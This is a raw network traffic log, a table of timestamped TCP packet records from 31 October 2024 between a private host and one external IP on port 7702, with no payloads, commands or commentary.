Oct 31, 2024 14:16:20.622246981 CET	49729	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:20.622247934 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622313023 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622322083 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622364998 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622375011 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622421026 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622500896 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622606993 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622627974 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622752905 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622767925 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622786999 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622797966 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622848034 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622900009 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622931004 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622942924 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622955084 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.622975111 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.623075962 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.623086929 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.623123884 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.623133898 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.623146057 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626250029 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626276016 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626321077 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626332045 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626343012 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626390934 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626405954 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626425028 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626435995 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626477003 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626530886 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626574039 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626595020 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626640081 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626650095 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626687050 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626749039 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626760006 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626770973 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626791954 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626801014 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626877069 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626892090 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626915932 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626940012 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.626988888 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.627074003 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.627135992 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.627146959 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.627151012 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.627160072 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.627181053 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.627192020 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.627229929 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.627242088 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.627253056 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:20.627264023 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:21.143946886 CET	49729	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:21.148875952 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:21.148989916 CET	49729	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:21.154031038 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:21.433284044 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:21.591084957 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:21.591162920 CET	49729	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:21.599100113 CET	49729	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:21.604479074 CET	7702	49729	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:21.604535103 CET	49729	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:31.172440052 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:31.177333117 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:31.177438974 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:31.188185930 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:31.193289995 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:31.193393946 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:31.198282957 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.129897118 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.130302906 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.130314112 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.130364895 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.130374908 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.130386114 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.130388975 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.130393028 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.130419016 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.130456924 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.130486965 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.130496979 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.130563974 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.130590916 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.130731106 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.135370970 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.135440111 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.135451078 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.135462046 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.135493040 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.135529995 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.268552065 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.268636942 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.268649101 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.268662930 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.268703938 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.268759966 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.268764973 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.268776894 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.268861055 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.269196033 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.269207954 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.269224882 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.269236088 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.269248962 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.269251108 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.269283056 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.290294886 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.290369987 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.291430950 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.386588097 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.386615038 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.386627913 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.386662960 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.386754036 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.386770010 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.386792898 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.386792898 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.386846066 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.387080908 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.387144089 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.387149096 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.387161016 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.387196064 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.387278080 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.387290001 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.387300014 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.387334108 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.409584999 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.409603119 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.409615040 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.409629107 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.409713030 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.409713030 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.504776955 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.504879951 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.504940987 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.504954100 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.505023956 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.505023956 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.505050898 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.505126953 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.505146027 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.505228043 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.505301952 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.505312920 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.505465984 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.505465984 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.505637884 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.505722046 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.505733967 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.505888939 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.505902052 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.506196976 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.506196976 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.527256966 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.527333975 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.527441978 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.527650118 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.527776003 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.527781963 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.580509901 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.623406887 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.623420954 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.623524904 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.623541117 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.623613119 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.623677015 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.623682022 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.623723030 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.623734951 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.623753071 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.623783112 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.623825073 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.624238968 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.624250889 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.624262094 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.624349117 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.624600887 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.624641895 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.624665022 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.624701023 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.624713898 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.624727011 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.645656109 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.645673037 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.645739079 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.646162033 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.646229982 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.646703005 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.741725922 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.741806984 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.741810083 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.741981030 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.741991997 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742027998 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742047071 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742080927 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.742080927 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.742305994 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742316008 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742382050 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.742410898 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742472887 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742477894 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.742486954 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742558002 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.742814064 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742849112 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742860079 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742930889 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.742938042 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.742996931 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.743010998 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.764312029 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.764362097 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.764368057 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.764620066 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.764933109 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.765480042 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.814966917 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.860322952 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.860579967 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.860591888 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.860603094 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.860624075 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.860632896 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.860636950 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.860692978 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.860784054 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.860850096 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.860868931 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.860899925 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.860982895 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.860995054 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.861073017 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.861546040 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.861598015 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.861608982 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.861624956 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.861659050 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.861947060 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.861960888 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.862015963 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.862054110 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.882440090 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.882477999 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.882493019 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.883040905 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.883065939 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.883096933 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.930423021 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.978770018 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.978915930 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979001999 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.979151011 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979212046 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979227066 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979283094 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.979306936 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979363918 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979376078 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979415894 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.979456902 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.979490995 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979804993 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979861975 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979871988 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979907990 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.979916096 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.979943037 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.980310917 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:32.980362892 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:32.980411053 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.002090931 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.002176046 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.002186060 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.002224922 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.002224922 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.002284050 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.002337933 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.002388954 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.098205090 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.098262072 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.098274946 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.098344088 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.098391056 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.098403931 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.098416090 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.098438978 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.098479986 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.098660946 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.098674059 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.098686934 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.098699093 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.098766088 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.098766088 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.098792076 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.099255085 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.099303961 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.099348068 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.120238066 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.120301962 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.120305061 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.120317936 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.120383978 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.165404081 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.165445089 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.165509939 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.165559053 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.165589094 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.165720940 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.235630989 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.235696077 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.235730886 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.235749960 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.235821962 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.235838890 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.235856056 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.235874891 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.235889912 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.236021996 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.236090899 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.236103058 CET	7702	49793	185.36.141.107	192.168.2.7
